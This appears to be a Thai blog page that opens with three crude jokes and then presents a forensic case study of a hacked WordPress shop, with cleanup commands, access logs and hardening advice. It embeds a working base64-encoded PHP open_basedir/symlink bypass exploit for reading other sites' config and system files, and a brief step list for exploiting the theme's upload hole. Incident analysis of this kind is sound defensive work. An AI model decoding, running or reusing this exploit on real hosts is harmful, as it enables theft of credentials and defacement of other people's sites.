นศ. : บอร์ดไม่มีปัญหาอะไรหรอกคะ แต่ว่า ชื่อ-นามสกุล หนู....
อ. : ทำไม…..อ๋อ! เค้าคงพิมพ์ผิดละซิ ไม่เป็นไรหรอก เรื่องปกตินะ
นศ. : คือว่า...สำหรับคนอื่น คงไม่เป็นไรหรอกค่ะ ...แต่นามสกุลหนูน่ะ
อ. : ทำไมเหรอ นามสกุลหนูมันเป็นอะไร?...แล้วเธอ นามสกุลอะไร
นศ. : หนูนามสกุล "หีบหอม"
อ. : อ้าว! ฝ่ายทะเบียนคงพิมพ์ตกตัว"บ"ละซิ
นศ.: ไม่ใช่ค่ะ ฝ่ายทะเบียนเค้าพิมพ์ไม้เอก เกินบนตัว"บ"...ค่ะ.

ใช้ช้อน

ผมเคยไปกินข้าวที่ร้านอาหารแห่งหนึ่ง
ผมสังเกตเห็นว่าบริกรที่มารับออร์เดอร์มีช้อนอยู่ในกระเป๋าเสื้
พอผมมองไปทั่วๆจึงเห็นว่าบริกรในร้านมีช้อนอยู่ในกระเป๋าเสื้อกันทุกคน 
ด้วยความสงสัยผมจึงถามเขาดู
"ขอถามหน่อยเถอะมีไว้ทำไมเนี่ยเห็นมีกันทุกคนเลย"
"ช้อนนี่หรือครับ"
"เจ้าของร้านเขาจ้างบริษัทที่ปรึกษามาเพิ่มประสิทธิภาพการทำงานของพนักงานน่ะครับ
เขาเก็บข้อมูลอยู่หลายเดือนแล้วก็บอกว่า
ลูกค้าจะทำช้อนตกมากว่าอย่างอื่นถึง ๗๓.๘๔%
ซึ่งตกประมาณ ๓ ครั้งต่อโต๊ะต่อชั่วโมง
ซึ่งถ้าพนักงานเราเตรียมการไว้ก่อนก็จะสามารถลดจำนวนครั้งที่จะต้องเดินกลับไปที่ครัว
และก็สามารถลดพนักงานที่ใช้ลงได้ ๑ คนต่อกะ"
พอเขาพูดเสร็จผมก็ได้ยินเสียงช้อนหล่นอยู่หลังผม บริกรที่คุยอยู่กับผมก็หยิบช้อนในกระเป๋าเสื้อส่งให้ใหม่แล้วบอกว่า
"ผมจะหยิบอันใหม่เมื่อผมผมกลับไปที่ครัวแทนที่จะรีบเข้าไปหยิบในครัวเดี๋ยวนี้" 
ผมรู้สึกประทับใจมากและเมื่อผมมองดูรอบๆอีกครั้งผมก็สังเกตเห็นด้ายเส้นเล็กๆห้อยออกมาจากช่องซิปกางเกงของบริกรทุกคน ด้วยความสงสัยผมจึงถามบริกรคนเดิมอีกครั้ง
"รบกวนอีกทีเถอะ ทำไมถึงต้องมีด้ายห้อยออกมาจากตรงนั้นด้วย"
"โอ้โฮเฮะ" เขาดูตื่นเต้นมาก "ผมไม่เคยเจอใครช่างสังเกตอย่างคุณเลยนะครับ จริงๆแล้วนี่ก็เป็นผลงานของบริษัทที่ปรึกษาเจ้าเดิมนั่นแหละ เขาบอกว่ามันทำให้เราสามารถประหยัดเวลาที่ใช้ตอนเข้าห้องน้ำได้"
"ประหยัดได้ไง" ผมสงสัย 
"ก็..." เขาอธิบาย "เราผูกด้ายนี่เข้ากับปลายนั่น คุณคงเข้าใจนะครับ แล้วพอจะฉี่เราก็แค่ดึงด้วยนี่ออกมามือก็ไม่เลอะ มันก็ประหยัดเวลาที่ต้องล้างมือไปได้เขาว่ามันทำให้ประหยัดเวลาที่ต้องใช้ในห้องน้ำลงไปตั้ง ๗๖.๓๙% แน่ะ"
"อืม... ร้ายจริงๆ" ผมรู้สึกทึ่ง 
"ว่าแต่ว่าด้ายนั่นช่วยตอนเอาออกมา แล้วตอนเก็บเข้าไปล่ะจะทำไง?"
"เอ่อ..." เขากระซิบ 
"ผมก็ไม่รู้ว่าคนอื่นเขาทำกันยังไง แต่ผมน่ะ...ใช้ช้อน"

ยาชาหมด

A: อ้าวเพื่อน หัวไปโดนอะไรมา?!!!!!!
B : กูตกบันไดจนหัวไปฟาดกับพื้นมาว่
A: คงจะเจ็บมากสินะ
B: ตอนไปถึงโรงพยาบาล หมอบอกต้องเย็บ 10 เข็ม แต่ยาชาดันหมดพอดี
A: เคราะห์ซ้ำ กรรมซัด
B : แต่มึงเชื่อมั้ย ตั้งแต่หมอเย็บแผลเข็มแรกยันเข็มสุดท้าย กูนอนนิ่ง ไม่มีร้องซักแอะ
A: แกนี่มันคนใจเพชรชัดๆ!!
B: ป่าว..กูสลบไปตั้งแต่รู้ว่ายาชาหมด

6/01/2556

Case Study: Web sites hacked, WordPress โดนแฮก และการแกะรอยแฮกเกอร์ (FingerPrint)

แฮกเกอร์:

ลักษณะการแฮก คือผู้ไม่หวังดีทำการอัพโหลดไฟล์ PHP สคริปต์ที่เขียนขึ้นเอง (ตัวอย่าง) ผ่านช่องโหว่ของปลั๊กอินสคริปต์อัพโหลดของ WordPress (“wp-content/uploads”) ขึ้นไปยังเว็บโฮสติ้ง โดยใช้ช่องโหว่ของ PHP 5.3.8 (exploits and vulnerabilities) ทำการ bypass ฟังก์ชั่น open_baseddir ให้เป็น Off (php.ini) หรือสมัครสมาชิกบนเว็บไซต์หลอกๆ แล้วเจาะช่องโหว่ผ่านยูสเซอร์ ทำให้สคริปต์สามารถทำงานทำงานบนไดร์เรกทอรีอื่นๆ ได้อีก คือยุ่มย่ามไปทั่วไดร์เรกทอรีเว็บไซต์ได้ตามสบาย เช่น การใช้เขียนสคริปต์คำสั่ง PHP ไปนำข้อมูลในไฟล์ “cat /etc/passwd” หรือการทำลิงก์ไปยัง / รูทไดเรกทอรี แล้วเขียน .htaccess ให้แสดงไฟล์ต่างบนเบราว์เซอร์ ลักษณ์นี้เรียกว่า PHP filesystem attacked สิ่งเหล่านี้แฮกเกอร์ล้วนใช้ประโยชน์จากช่องโหว่ของแอพพลิเคชั่น หรือใช้วิธีการที่เรียกกันว่า SQL Injection (การเจาะเข้าไปในระบบ) เพื่อเปลี่ยนแปลงข้อมูลเว็บไซต์และแสดงข้อมูลใหม่ต่อสายตาผู้เยี่ยมชมเว็บไซต์ ส่วนมากจะเป็นรูปภาพ หรือถ้อยคำไม่สุขภาพ เป็นต้น
ตัวอย่างโค๊ด [PHP 5.3.8 open_basedi() Bypass]: (ไม่ใช่สคริปต์สำหรับแฮก) ไป Base64 ดูโค๊ดกันเองนะครับ
/*
 * PHP 5.3.8 open_basedi() Bypasser
 *
 * Greetz: r0073r ( 1337day.com ), r4dc0re,Sid3^effects       & all members of r00tw0rm.com
 *
 * By CrosS
 * Only for Educational Purpose ))
 * Submit your exploits at > Submit@1337day.com
 *
*/
eval(base64_decode('JGZha2VkaXI9ImN4IjsNCiRmYWtlZGVwPTE2Ow0KDQokbnVtPTA7IC8vIG9mZnNldCBvZiBzeW1saW5rLiRudW0NCg0KaWYoIWVtcHR5KCRfR0VUWydmaWxlJ10pKSAkZmlsZT0kX0dFVFsnZmlsZSddOw0KZWxzZSBpZighZW1wdHkoJF9QT1NUWydmaWxlJ10pKSAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsNCmVsc2UgJGZpbGU9IiI7DQoNCmVjaG8gJzxQUkU+PGltZyBzcmM9Imh0dHA6Ly93d3cucjAwdHcwcm0uY29tL2xvZ28ucG5nIj48UD48YQ0KaHJlZj0iaHR0cDovL3IwMHR3MHJtLmNvbS8iIHRpdGxlPSJSMDBUVzBSTSAtIFBIUCBTeW1saW5rKCkgQnlwYXNzZXIiPlIwMFRXMFJNIC0gUEhQIFN5bWxpbmsoKSBCeXBhc3NlcjwvYT4NCkF1dGhvciA6IENyb3NTDQo8cD5Gb3IgRWR1Y2F0aW9uYWwgUHVycG9zZSBPbmx5IEx1bHoNCjxwPlBIUCA1LjMuOCBzeW1saW5rIG9wZW5fYmFzZWRpciBieXBhc3MNCjxwPk1vcmU6IDxhIGhyZWY9Imh0dHA6Ly9yMDB0dzBybS5jb20vIj5SMDBUVzBSTSAtIFByaXZhdGUgQ29tbXVuaXR5PC9hPg0KPHA+PGZvcm0gbmFtZT0iZm9ybSINCiBhY3Rpb249Imh0dHA6Ly8nLiRfU0VSVkVSWyJIVFRQX0hPU1QiXS5odG1sc3BlY2lhbGNoYXJzKCRfU0VSVkVSWyJQSFBfU0VMRiJdKS4nIiBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmaWxlIiBzaXplPSI1MCIgdmFsdWU9IicuaHRtbHNwZWNpYWxjaGFycygkZmlsZSkuJyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iaHltIiB2YWx1ZT0iQ3JlYXRlIFN5bWxpbmsiPjwvZm9ybT4nOw0KDQppZihlbXB0eSgkZmlsZSkpDQoJZXhpdDsNCg0KaWYoIWlzX3dyaXRhYmxlKCIuIikpDQoJZGllKCJub3Qgd3JpdGFibGUgZGlyZWN0b3J5Iik7DQoNCiRsZXZlbD0wOw0KDQpmb3IoJGFzPTA7JGFzPCRmYWtlZGVwOyRhcysrKXsNCglpZighZmlsZV9leGlzdHMoJGZha2VkaXIpKQ0KCQlta2RpcigkZmFrZWRpcik7DQoJY2hkaXIoJGZha2VkaXIpOw0KfQ0KDQp3aGlsZSgxPCRhcy0tKSBjaGRpcigiLi4iKTsNCg0KJGhhcmRzdHlsZSA9IGV4cGxvZGUoIi8iLCAkZmlsZSk7DQoNCmZvcigkYT0wOyRhPGNvdW50KCRoYXJkc3R5bGUpOyRhKyspew0KCWlmKCFlbXB0eSgkaGFyZHN0eWxlWyRhXSkpew0KCQlpZighZmlsZV9leGlzdHMoJGhhcmRzdHlsZVskYV0pKSANCgkJCW1rZGlyKCRoYXJkc3R5bGVbJGFdKTsNCgkJY2hkaXIoJGhhcmRzdHlsZVskYV0pOw0KCQkkYXMrKzsNCgl9DQp9DQokYXMrKzsNCndoaWxlKCRhcy0tKQ0KCWNoZGlyKCIuLiIpOw0KDQpAcm1kaXIoImZha2VzeW1saW5rIik7DQpAdW5saW5rKCJmYWtlc3ltbGluayIpOw0KDQpAc3ltbGluayhzdHJfcmVwZWF0KCRmYWtlZGlyLiIvIiwkZmFrZWRlcCksImZha2VzeW1saW5rIik7DQoNCi8vIHRoaXMgbG9vcCB3aWxsIHNraXAgYWxscmVhZHkgY3JlYXRlZCBzeW1saW5rcy4NCndoaWxlKDEpDQoJaWYodHJ1ZT09KEBzeW1saW5rKCJmYWtlc3ltbGluay8iLnN0cl9yZXBlYXQoIi4uLyIsJGZha2VkZXAtMSkuJGZpbGUsICJzeW1saW5rIi4kbnVtKSkpIGJyZWFrOw0KCWVsc2UgJG51bSsrOw0KDQpAdW5saW5rKCJmYWtlc3ltbGluayIpOw0KbWtkaXIoImZha2VzeW1saW5rIik7DQoNCmRpZSgnPEZPTlQgQ09MT1I9IlJFRCI+Y2hlY2sgc3ltbGluayA8YSBocmVmPSIuL3N5bWxpbmsnLiRudW0uJyI+c3ltbGluaycuJG51bS4nPC9hPiBmaWxlPC9GT05UPicpOw=='));
?>

ผลเสีย:

แน่นอนครับ ถ้าแก้ไขปัญหาได้เร็วก็โชดดีไปแล้ว แต่ถ้าไม่ทันการ กลุ่มแฮกเกอร์ก็จะประจานชื่อโดเมนเราต่อสายตาชาวโลก (แถมบันทึกชื่อเว็บไซต์ลงฐานข้อมูลให้ฟรีอีกต่างหากครับ)

แนวทางป้องกัน:

Webmaster: ครรอัพเดท CMS และ Plugin ที่ใช้งานอย่างสม่ำเสมอ (และก่อนอัพเดทควรตรวจสอบก่อนว่าเว็บเซิ์รฟเวอร์รองรับการทำงานหรือเปล่า)
Hosting Provider: เว็บเซิร์ฟเวอร์ควรทำ critical security update หรือ patch อย่างสม่ำเสมอ (เช่น PHP, Apache) และติดตามข่าวสาร exploit and vulnerability เพื่อรู้ทันแฮกเกอร์ (โดยปกติแล้วเหล่าแฮกเกอร์จะ submit exploits โชว์อยู่แล้ว)
สุดท้าย ไม่ว่าผู้ให้บริการเว็บโฮสติ้งจะระบบดีแค่ไหน เช่น การใช้เทคโนโลยีกลุ่มเมฆทำการกระจายโหลดโดยอัตโนมัติ (Cloud Technology) หรือระบบ HA ทั่วไป หากเว็บไซต์ยังขับเคลื่อนโดย CMS ผู้รับผิดชอบ (Webmaster) หรือ Web Developer (Outsource) ต้องใส่ใจเป็นพิเศษเรื่องความปลอดภัย
Case Study ก็คือแฮกเกอร์ทำการเจาะเข้าไปในระบบ (เจาะผ่านช่องทางไหน?) เพื่อเปลี่ยนแปลงข้อมูลเว็บไซต์ (ส่วนมากแล้ว หน้าแรก index ไฟล์) ส่วนข้อมูลใหม่ที่แสดงก็ขึ้นอยู่กับกลุ่มแฮกเกอร์เหล่านั้นใช้รูปภาพสัญญาลักษณ์อะไร หรืออาจถ้อยคำไม่สุขภาพ เป็นต้น แต่ที่สำคัญ case นี้แฮกเกอร์ไม่ได้ทำเท่าที่ว่ามา มีการรันสคริปต์ผ่านเว็บเบราว์เซอร์เพื่อให้ในการดึงข้อมูลระบบมาแสดง (รายละเอียดอธิบายด้านล่างครับ)
Indonesian Cyber Army
Indonesian Cyber Army
Indonesian Cyber Army
Indonesian Cyber Army
มาเริ่มเลยล่ะกัน
[ขั้นตอนที่ 1] – ให้สำรองไดรเรกทอรีที่ติดเชื้อไว้ทั้งหมด (ไดร์เรกทอรี WordPress)
[ขั้นตอนที่ 2] – สั่งหยุดการทำงานของเว็บเซิร์ฟเวอร์ (Apache)
[ขั้นตอนที่ 3] – แก้ไขปัญหาที่เกิดขึ้นอย่างรวดเร็ว (แบบชั่วคราวก่อน)
[3.1] ตรวจสอบไดร์เรกทอรี “wp-connent/uploads/” ว่ามีไฟล์แปลกบ้างไหม (ปกติ WordPress จะไม่มีไฟล์ PHP ในไดร์เรกทอรีนี้) หรือใช้วิธีเปรียบเทียบไฟล์กับข้อมูล backup ก็ได้
find . -wholename '*wp-content/uploads/*.php' -exec ls -al {} \;
ผลลัพธ์ที่ได้ (คัดลอกมาเป็นตัวอย่าง)
lrwxrwxrwx 1 apache apache 33 May 27 20:13 ./wp-content/uploads/sTein/news .. config.php -> /home/news/public_html/config.php
lrwxrwxrwx 1 apache apache 33 May 27 20:13 ./wp-content/uploads/sTein/pcap .. config.php -> /home/user1/public_html/config.php
lrwxrwxrwx 1 apache apache 42 May 27 20:13 ./wp-content/uploads/sTein/user1.. conf_global.php -> /home/user1/public_html/conf_global.php
lrwxrwxrwx 1 apache apache 34 May 27 20:13 ./wp-content/uploads/sTein/gdm .. Settings.php -> /home/gdm/public_html/Settings.php
lrwxrwxrwx 1 apache apache 38 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/haldaemon .. config.php -> /home/haldaemon/public_html/config.php
lrwxrwxrwx 1 apache apache 36 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/nscd .. wp-config.php -> /home/user1/public_html/wp-config.php
lrwxrwxrwx 1 apache apache 39 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/operator .. Settings.php -> /home/operator/public_html/Settings.php
lrwxrwxrwx 1 apache apache 34 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/avahi .. config.php -> /home/user1/public_html/config.php
lrwxrwxrwx 1 apache apache 38 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/user1.. Settings.php -> /home/user1/public_html/Settings.php
lrwxrwxrwx 1 apache apache 41 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/vmail .. configuration.php -> /home/vmail/public_html/configuration.php
lrwxrwxrwx 1 apache apache 35 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/root .. Settings.php -> /home/root/public_html/Settings.php
lrwxrwxrwx 1 apache apache 35 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/sshd .. Settings.php -> /home/sshd/public_html/Settings.php
lrwxrwxrwx 1 apache apache 42 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/operator .. conf_global.php -> /home/operator/public_html/conf_global.php
lrwxrwxrwx 1 apache apache 44 May 28 18:03 ./wp-content/uploads/products_img/JAMBAN/shutdown .. configuration.php -> /home/shutdown/public_html/configuration
ก่อนที่จะลบอาจใช้วิธีค้นหาไฟล์ที่มีการแก้ไขใน 24 ชั่วโมงที่ผ่าน (trick ดูเฉพาะไฟล์ที่เป็น utf8)
find . -mmin -1440 -iname "*.php"
จากนั้นให้ลบไฟล์เหล่านั้นทิ้งอย่างให้เหลือ :-
find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;
สคริปต์แฮกเกอร์จัดเต็มอะไรให้เราบ้าง (ไดร์เรอทอรีที่สร้างขึ้น) มาดูกันครับ ไล้ลบให้หมดครับ
./INDISHELL/
./wp-content/uploads/sTein/
./wp-content/uploads/products_img/
./wp-content/uploads/products_img/JAMBAN/
./wp-content/uploads/products_img/index.php
./confkiller.php
./index.php
จากนั้นลบไฟล์ที่ติดเชื้อ (Infected PHP files)
find . -iname "*utf*.php" -exec rm -rf {} \;
ระหว่างนี้สามารถสตาร์เซิร์ฟเวอร์เว็บเซิร์ฟเวอร์ได้ (เพื่อตรวจสอบ)
[โอเคดูเหมือนเว็บไซต์สามารถให้บริการต่อได้แล้ว] มาต่อเรื่องทางเทคนิคของแฮกเกอร์กันเลย
แล้วแฮกเกอร์มาจากไหน? ลำดับแรกให้ตรวจสอบ access_log (ขอโดเมน)
- ตรวจสอบไอพีแอดเดรสว่ามาจากที่ไหนมีที่ชุมหัวนอนหรือเปล่า โดยใช้ Web Tools ต่างๆ เช่นwww.maxmind.comwww.ip2location.com
180.244.249.92 (อินโดนีเซีย) มาจากกลุ่ม Indonesian Cyber Army
Location: Bogor, Indonesia, Asia
ISP: PT Telkom Indonesia
“วาว ว่าว ว้าว” มีที่หลับนอนซะด้วย (การแฉกลุ่มคนเหล่านี้ไม่จำเป็นต้องซ่อนไอพีแอดเดรส)
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
แฮกเกอร์เรียกฟังก์ชั่น sws=sym ซึ่งสคริปต์จะสร้าง symlink ต่างๆ นาๆ
180.244.249.92 - - [28/May/2013:14:54:09 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
แฮกเกอร์เรียกฟังก์ชั่น Bypass Read
180.244.249.92 - - [28/May/2013:14:54:11 +0700] "GET /confkiller.php HTTP/1.1" 200 4842
จากนั้นแฮกเกอร์เอกซคิวไฟล์ confkiller.php โดยที่สคริปต์จะไปสร้างไดร์เรกทอรี Indishell, INDISHELL พร้อมกำหนดสิทธ์ให้เป็น 0777
180.244.249.92 - - [28/May/2013:14:54:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน/httpd/html/shop/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:54:15 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน/httpd/html/shop/ HTTP/1.1" 200 136865
แฮกเกอร์เริ่มใช้ช่องธีมของ WordPress ชื่อธีม eShop (สำหรับคนไหนใช่อยู่ อ่านมาถึงตรงนี้น่าจะรู้สึกร้อนๆ หนาวๆ)
180.244.249.92 - - [28/May/2013:14:54:20 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
หลังจากอัพโหลดไฟล์ผ่านช่องโหว่ WordPress + ธีม ก็ได้เวลาสั่งให้สคริปต์ทำงาน
ถ้าดูจาก log จะเห็นว่าแฮกเกอร์ใช้เวลาไม่ถึง 5 นาที รายละเอียดโค๊ดสคริปต์สามารถดูได้จากไฟล์ files.php (ไม่ขออัพโหลดสคริปต์ขึ้นให้ดูนะครับ เพื่อนความปลอดภัยเดี๋ยวนำไปใช้ในทางที่ไม่เหมาะสม)
ขั้นตอนถัดมาให้ดาวน์โหลดไฟล์ที่แฮกเกอร์สร้างขึ้น แล้วเปิดด้วยโปรแกรม Text editor เพื่อดูสคริปต์ว่าไปยุมยามอะไรที่ไหนบนไดร์เรกทอรีระบบบ้าง (บางไฟล์สคริปต์มีการเข้ารหัส ต้อง decode)


แนวทางการแก้ไข:

ดาวน์โหลดไฟล์ /eShop/upload/index.php และ upload.php เปิดด้วยโปรแกรม Text Editor ตรวจสอบว่า filetypes ที่อัพโหลดได้เป็นนามสกุลไรบ้าง (วิธีป้องการชั่วคราวก็แค่ไม่อนุญาตให้อัพโหลดไฟล์ php)
แต่ถึงแม้ไม่อนุญาตให้อัพโหลดไฟล์นามสกุล PHP ได้ แต่ถ้าอัพโหลด png เป็นรูปโป้ ก็เหมือนเดิม
ช่องโหว่นี้ลำดับแรกต้องแก้ไขที่ themes ก่อนค่อยไปอุดช่องโหว่ที่เว็บเซิร์ฟเวอร์
ตัวอย่างโค๊ดจะ redirect ไปหน้า home page
/var/www/html/ช้อปปิ้ง.โดเมน.คอม/httpd/html/shop/wp-content/themes/wpshop/upload/​index.php​
if (!isset($_SERVER['HTTP_REFERER'])){
header("Location: /");
exit;
}


คำแนะนำ:

- อัพเกรด Apahce, PHP
- อัพเกรด WordPress เป็นเวอร์ชั่นล่าสุด
- เปลี่ยนยูสเซอร์ และรหัสผ่าน ทั้ง WordPress admin และ MySQL (ปกติเก็บเป็น plain text ที่ไฟล์ wp-config.php)


How to exploit deface web shopping

- อัพโหลดไฟล์สคริปต์
http://ช้อปปิ้ง.โดเมน.คอม/wp-content/themes/wpshop/upload/
- รันไฟล์สคริปต์
http://ช้อปปิ้ง.โดเมน.คอม/wp-content/uploads/products_img/สคริปต์.php


เครื่องมือที่ใช้:

- PHP Decoder
http://www.unphp.net/
คราวนี้มาดูรายละเอียดจาก access_log ไฟล์กันบ้างครับ
### –> START: ACCESS YOUR SITE ###
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.0.4.1 HTTP/1.1" 200 5615
180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/slider.css HTTP/1.1" 200 2474
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/superfish.css HTTP/1.1" 200 3633
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/thickbox.css HTTP/1.1" 200 4014
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/style.css HTTP/1.1" 200 35201
### –> START ATTACKING ###
เปิดเว็บไซต์พาท /wp-content/themes/อีช้อปปิ้ง/upload/upload.php โดยใช่ช่องโหว่ของปลั๊กอิน จากนั้นแฮกเกอร์อัพโหลดไฟล์สคริปต์ (idca.php) ไฟล์นี้เข้ารหัสไว้มากกว่าหนึ่งฟังก์ชั่น
จากนั้นรันเรียกไฟล์สคริปต์ตามด้วยพาทที่ต้องการ (?y ดีฟอลล์พาทที่เก็บข้อมูลเว็บไซต์)
180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/อีช้อปปิ้ง/upload/upload.php?img=&nonce= HTTP/1.1" 200 169
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -
180.244.249.92 - - [28/May/2013:14:49:08 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -
180.244.249.92 - - [28/May/2013:14:49:15 +0700] "POST /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904
180.244.249.92 - - [28/May/2013:14:49:39 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904
### –> [1] END ATTACKED SUCCESS ###
พยายามเจาะไปเรื่อยๆ จนแฮกเกอร์สามารถเรียกฟังก์ชั่นอัพโหลดผ่านไฟล์สคริปต์ idca.php แล้วทำการอัพโหลดไฟล์สคริปต์อื่นเขาไปยังรูทไดเรกทอรีของโดเมนนั้นๆ 
180.244.249.92 - - [28/May/2013:14:49:41 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/ HTTP/1.1" 200 27718
180.244.249.92 - - [28/May/2013:14:49:44 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:49:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880
180.244.249.92 - - [28/May/2013:14:49:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:49:59 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:50:02 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 121198
180.244.249.92 - - [28/May/2013:14:50:05 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:50:10 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13730
180.244.249.92 - - [28/May/2013:14:50:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124263
180.244.249.92 - - [28/May/2013:14:51:07 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383
180.244.249.92 - - [28/May/2013:14:51:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383
180.244.249.92 - - [28/May/2013:14:51:18 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 12513
180.244.249.92 - - [28/May/2013:14:51:27 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 46661
### –> [2] END ATTACKED SUCCESS ###
ดูเหมือนทำงานกันเป็นทีมเล็กๆ โดยพยายามเจาะเข้าหน้า admin ของ WordPress ด้วย
[Indonesian and Chaina]
180.244.249.92 - - [28/May/2013:14:53:12 +0700] "GET /files.php HTTP/1.1" 200 2832
142.4.101.26 - - [28/May/2013:14:53:12 +0700] "GET /wp-login.php HTTP/1.0" 200 2245
อัพโหลดไฟล์ files.php สำเร็จ
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
### –> [3] END ATTACKED SUCCESS ###
อัพโหลดไฟล์เพิ่มเติม confkiller.php
180.244.249.92 - - [28/May/2013:14:53:21 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:53:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 129458
180.244.249.92 - - [28/May/2013:14:53:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:53:32 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13734
180.244.249.92 - - [28/May/2013:14:53:42 +0700] "POST /confkiller.php HTTP/1.1" 200 5422   #<--hacker: code="" file="" files.php="" name="" upload="">
180.244.249.92 - - [28/May/2013:14:53:43 +0700] "POST /confkiller.php HTTP/1.1" 200 5243   #<--hacker: code="" confkiller.php="" file="" name="" upload="">
### –> [4] END ATTACKED SUCCESS ###
สั่งผ่านเว็บเบราว์เซอร์เรียกสคริปต์ไฟล์ confkiller.php ทำงาน
180.244.249.92 - - [28/May/2013:14:53:45 +0700] "GET /INDISHELL/ HTTP/1.1" 200 705

180.244.249.92 - - [28/May/2013:14:54:09 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:11 +0700] "GET /confkiller.php HTTP/1.1" 200 4842
180.244.249.92 - - [28/May/2013:14:54:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:54:15 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 136865
180.244.249.92 - - [28/May/2013:14:54:20 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:54:23 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
